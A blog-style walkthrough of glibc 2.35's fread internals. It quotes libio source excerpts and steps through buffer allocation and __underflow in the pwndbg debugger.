<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_size_t<br>_IO_sgetn (_IO_FILE *fp, void *data, _IO_size_t n)<br>&#123;<br>  /* FIXME handle putback buffer here! */<br>  return _IO_XSGETN (fp, data, n);<br>&#125;<br>libc_hidden_def (_IO_sgetn)<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">goto _io_xsgetn</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;#define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N)&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_file_xsgetn&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is the core function that handles data reading for </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fread&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">. It can be divided into the following parts:</font></p>
<ol>
<li><font style="color:rgb(31, 9, 9);">When </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is NULL, it indicates that the pointers in the FILE structure are uninitialized and the input buffer has not been established. In this case, </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_doallocbuf&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is called to initialize the pointers and set up the input buffer.</font></li>
<li><font style="color:rgb(31, 9, 9);">When there is data in the input buffer (i.e., </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_read_ptr&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is less than </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_read_end&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">), the data from the buffer is directly copied to the target buffer.</font></li>
<li><font style="color:rgb(31, 9, 9);">If the input buffer is empty or cannot fully satisfy the read request, </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;__underflow&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is called to invoke a system call and read data into the input buffer.</font></li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_size_t<br>_IO_file_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)<br>&#123;<br>  _IO_size_t want, have;<br>  _IO_ssize_t count;<br>  char *s = data;<br><br>  want = n;<br><br>  if (fp-&gt;_IO_buf_base == NULL)<br>    &#123;<br>      ...<br>      _IO_doallocbuf (fp);<br>    &#125;<br><br>  while (want &gt; 0)<br>    &#123;<br><br>      have = fp-&gt;_IO_read_end - fp-&gt;_IO_read_ptr;<br>      if (want &lt;= have)   <br>    &#123;<br>      memcpy (s, fp-&gt;_IO_read_ptr, want);<br>      fp-&gt;_IO_read_ptr += want;<br>      want = 0;<br>    &#125;<br>      else<br>    &#123;<br>      if (have &gt; 0)  <br>        &#123;<br>          ...<br>          memcpy (s, fp-&gt;_IO_read_ptr, have);<br>          s += have;<br><br>          want -= have;<br>          fp-&gt;_IO_read_ptr += have;<br>        &#125;<br><br><br>      if (fp-&gt;_IO_buf_base<br>          &amp;&amp; want &lt; (size_t) (fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base))<br>        &#123;<br>          if (__underflow (fp) == EOF)  <br>         break;<br>          continue;<br>        &#125;<br>      ...<br>  return n - want;<br>&#125;<br>libc_hidden_def (_IO_file_xsgetn)<br></code></pre></td></tr></table></figure>

<h4 id="STAGE1"><a href="#STAGE1" class="headerlink" title="STAGE1	"></a><font style="color:rgb(31, 9, 9);">STAGE1</font><font style="color:rgb(31, 9, 9);">	</font></h4><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">First, when </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is NULL, meaning the input buffer has not been established, the code calls </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_doallocbuf&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> to create the input buffer. Let’s follow into the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_doallocbuf&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> function to see how it initializes the buffer and allocates space for the input buffer. The file is located in </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;/libio/genops.c&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plain">void<br>_IO_doallocbuf (_IO_FILE *fp)<br>&#123;<br>  if (fp-&gt;_IO_buf_base) <br>    return;<br>  if (!(fp-&gt;_flags &amp; _IO_UNBUFFERED) || fp-&gt;_mode &gt; 0) <br>    if (_IO_DOALLOCATE (fp) != EOF) <br>      return;<br>  _IO_setb (fp, fp-&gt;_shortbuf, fp-&gt;_shortbuf+1, 0);<br>&#125;<br>libc_hidden_def (_IO_doallocbuf)<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The function first checks whether </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is NULL. If it is not NULL, it indicates that the input buffer has already been initialized, and the function returns directly. If it is NULL, the function then checks </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_flags&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> to see if it is </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_UNBUFFERED&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> or if </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_mode&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is greater than 0. If either condition is met, it calls </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_file_doallocate&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> from the FILE’s vtable. Let’s follow into this function, located in </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;/libio/filedoalloc.c&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs plain">_IO_file_doallocate (_IO_FILE *fp)<br>&#123;<br>  _IO_size_t size;<br>  char *p;<br>  struct stat64 st;<br><br>  ...<br>  size = _IO_BUFSIZ;<br>  ...<br>  if (fp-&gt;_fileno &gt;= 0 &amp;&amp; __builtin_expect (_IO_SYSSTAT (fp, &amp;st), 0) &gt;= 0) <br>   &#123;<br>     ... <br>     if (st.st_blksize &gt; 0)<br>         size = st.st_blksize;<br>     ...<br>   &#125;<br> p = malloc (size);<br> ...<br> _IO_setb (fp, p, p + size, 1); <br>  return 1;<br>&#125;<br>libc_hidden_def (_IO_file_doallocate)<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">And we still keep going to the func </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_setb&lt;/font&gt;</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plain">void<br>_IO_setb (_IO_FILE *f, char *b, char *eb, int a)<br>&#123;<br>  ...<br>  f-&gt;_IO_buf_base = b; <br>  f-&gt;_IO_buf_end = eb; <br>  ...<br>&#125;<br>libc_hidden_def (_IO_setb)<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After setting </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> and </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_buf_end&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">, once </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;IO_setb&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> finishes executing, these two pointers in </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> are assigned their values.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">To have more inform we should download something, we put the glibc-2.35 to &#x2F;usr&#x2F;src&#x2F;glibc&#x2F;glibc-2.35.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">And we can see these</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245358430-a5ab9208-d4b9-4857-bc90-c95f3aebf6d3.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245358430-a5ab9208-d4b9-4857-bc90-c95f3aebf6d3.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">We will use some of the file to better trace our program.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">using the command below.</font></p>
<p><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;pwndbg&gt; directory /usr/src/glibc/glibc-2.35/libio&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">also we should use step or next to join or skip another func such as belows.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245369740-6ffcb77e-97a0-4e53-b0d5-0a248b43ecf1.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245369740-6ffcb77e-97a0-4e53-b0d5-0a248b43ecf1.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245373408-326166cb-d7e0-4530-bda1-f6aecc6709bf.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245373408-326166cb-d7e0-4530-bda1-f6aecc6709bf.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">_IO_XSGETN is a macro. If we step directly, we can get the following diagram.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245382000-52709b0f-abf8-4dca-9666-eb76efd6ed7d.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245382000-52709b0f-abf8-4dca-9666-eb76efd6ed7d.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Due to its uninit we can see it go there as below</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245387446-38af7d02-36d7-490e-8087-e7a2db19c8a3.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245387446-38af7d02-36d7-490e-8087-e7a2db19c8a3.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245393698-aa73dab7-9a00-4cb8-bc70-98bb14068ea8.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245393698-aa73dab7-9a00-4cb8-bc70-98bb14068ea8.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After make the size we will see the filestructure again</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245399216-063750e3-3f33-4bfa-a92e-cc1449933260.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245399216-063750e3-3f33-4bfa-a92e-cc1449933260.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245405288-a55fcc94-4e3e-4629-af30-63a2e8263945.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245405288-a55fcc94-4e3e-4629-af30-63a2e8263945.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Still we can see the point will have some values.</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245411902-2d225f3e-aea0-45cf-8688-274cce58dcac.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245411902-2d225f3e-aea0-45cf-8688-274cce58dcac.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">For there we finish the stage1</font></p>
<h4 id="STAGE2"><a href="#STAGE2" class="headerlink" title="STAGE2"></a><font style="color:rgb(31, 9, 9);">STAGE2</font></h4><p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Next, the program enters stage2: copying data from the </font><strong><font style="color:rgb(31, 9, 9);">input buffer</font></strong><font style="color:rgb(31, 9, 9);">.</font><font style="color:rgb(31, 9, 9);">If the buffer already contains data, it is copied directly to the </font><strong><font style="color:rgb(31, 9, 9);">destination buffer</font></strong><font style="color:rgb(31, 9, 9);">.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Here we can see that</font></p>
<ul>
<li><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_read_ptr&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> points to the </font><strong><font style="color:rgb(31, 9, 9);">start</font></strong><font style="color:rgb(31, 9, 9);"> of the input buffer,</font></li>
<li><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_read_end&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> points to the </font><strong><font style="color:rgb(31, 9, 9);">end</font></strong><font style="color:rgb(31, 9, 9);"> of the input buffer.</font></li>
</ul>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The region between these two pointers is copied to the destination buffer with </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;memcpy&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">When the input buffer is </font><strong><font style="color:rgb(31, 9, 9);">empty</font></strong><font style="color:rgb(31, 9, 9);"> or does </font><strong><font style="color:rgb(31, 9, 9);">not satisfy the request</font></strong><font style="color:rgb(31, 9, 9);">, execution proceeds to the final step:</font><code>**&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;__underflow&lt;/font&gt;**</code><font style="color:rgb(31, 9, 9);">, which issues the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;read&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> system call to refill the buffer.In our example this is the </font><strong><font style="color:rgb(31, 9, 9);">first read</font></strong><font style="color:rgb(31, 9, 9);">, so both </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_read_ptr&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> and </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_read_end&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> are </font><strong><font style="color:rgb(31, 9, 9);">NULL</font></strong><font style="color:rgb(31, 9, 9);">;consequently we enter </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;__underflow&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">The implementation is located in </font><strong><font style="color:rgb(31, 9, 9);">&#x2F;libio&#x2F;genops.c</font></strong><font style="color:rgb(31, 9, 9);">—let’s step into it.</font></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs plain">int<br>__underflow (_IO_FILE *fp)<br>&#123;<br>  ...<br>  if (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)<br>    return *(unsigned char *) fp-&gt;_IO_read_ptr;<br>  ...<br>  return _IO_UNDERFLOW (fp);<br>&#125;<br>libc_hidden_def (__underflow)<br></code></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245426942-5ed1655d-c3f7-45f1-9ad0-446ccf2f5fd0.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245426942-5ed1655d-c3f7-45f1-9ad0-446ccf2f5fd0.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Invoke the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_UNDERFLOW&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> function. </font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245431584-4719c192-20cf-4742-90dd-a8c062a72c1d.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245431584-4719c192-20cf-4742-90dd-a8c062a72c1d.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245438133-1bf659f7-a656-4b75-8ad5-11ed83cc005a.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245438133-1bf659f7-a656-4b75-8ad5-11ed83cc005a.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs plain">int<br>_IO_new_file_underflow (_IO_FILE *fp)<br>&#123;<br>  _IO_ssize_t count;<br>  ...<br>  if (fp-&gt;_flags &amp; _IO_NO_READS)<br>    &#123;<br>      fp-&gt;_flags |= _IO_ERR_SEEN;<br>      __set_errno (EBADF);<br>      return EOF;<br>    &#125;<br>  if (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)<br>    return *(unsigned char *) fp-&gt;_IO_read_ptr;<br>  ...<br>  if (fp-&gt;_IO_buf_base == NULL)<br>    &#123;<br>      ...<br>      _IO_doallocbuf (fp);<br>    &#125;<br>  ...<br>  fp-&gt;_IO_read_base = fp-&gt;_IO_read_ptr = fp-&gt;_IO_buf_base;<br>  fp-&gt;_IO_read_end = fp-&gt;_IO_buf_base;<br>  fp-&gt;_IO_write_base = fp-&gt;_IO_write_ptr = fp-&gt;_IO_write_end<br>    = fp-&gt;_IO_buf_base;<br>  count = _IO_SYSREAD (fp, fp-&gt;_IO_buf_base,<br>               fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base);<br>  ...<br>  fp-&gt;_IO_read_end += count;<br>  ...<br>  return *(unsigned char *) fp-&gt;_IO_read_ptr;<br>&#125;<br>libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)<br></code></pre></td></tr></table></figure>

<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">This </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_new_file_underflow&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> function is the point where the system call is ultimately invoked. Before finally executing the system call, there are still some checks. The entire process is as follows:</font></p>
<ol>
<li><font style="color:rgb(31, 9, 9);">Check whether the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_flags&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> field of the FILE structure contains </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_NO_READS&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">. If this flag is present, it directly returns </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;EOF&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">. The </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_NO_READS&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> flag is defined as:</font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;#define _IO_NO_READS 4 /* Reading not allowed */&lt;/font&gt;</code></li>
<li><font style="color:rgb(31, 9, 9);">If </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> is </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;NULL&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">, call </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_doallocbuf&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> to allocate the input buffer.</font></li>
<li><font style="color:rgb(31, 9, 9);">Then, initialize and set the FILE structure pointers, setting all of them to </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font></li>
<li><font style="color:rgb(31, 9, 9);">Call </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_SYSREAD&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> (the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;_IO_file_read&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> function in the vtable), which ultimately executes the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;read&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);"> system call.</font><font style="color:rgb(31, 9, 9);">The data is read into </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">, and the read size is the input buffer capacity:</font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base&lt;/font&gt;</code><font style="color:rgb(31, 9, 9);">.</font></li>
<li><font style="color:rgb(31, 9, 9);">Then mark the amount of data now available in the input buffer by updating</font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;fp-&gt;_IO_read_end += count&lt;/font&gt;</code></li>
</ol>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245454305-d7b1a946-8d36-471a-98e2-00271a8ac4b3.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245454305-d7b1a946-8d36-471a-98e2-00271a8ac4b3.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245457337-20921ae1-15cd-4bb4-b1ab-e06f443eaf89.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245457337-20921ae1-15cd-4bb4-b1ab-e06f443eaf89.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245461865-dfdeff2a-4a7d-4370-9294-53413e3b7ca8.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245461865-dfdeff2a-4a7d-4370-9294-53413e3b7ca8.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">After these functions, all pointers in the FILE structure have been initialized, the file data has been read in, and the input buffer now contains valid data.</font></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Let’s see it!!!</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p class='item-img' data-src='https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245472618-cd88a9b5-504d-42f4-98e6-23492d0015e5.png'><img src="https://cdn.nlark.com/yuque/0/2025/png/46558077/1764245472618-cd88a9b5-504d-42f4-98e6-23492d0015e5.png"></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">for here we will ret to _IO_file_xsgetn because of the </font><code>&lt;font style=&quot;color:rgb(31, 9, 9);background-color:rgb(218, 218, 218);&quot;&gt;while&lt;/font&gt;</code></p>
<p><font style="color:rgb(31, 9, 9);">	</font><font style="color:rgb(31, 9, 9);">Then we will go another process, because i just close it…</font></p>
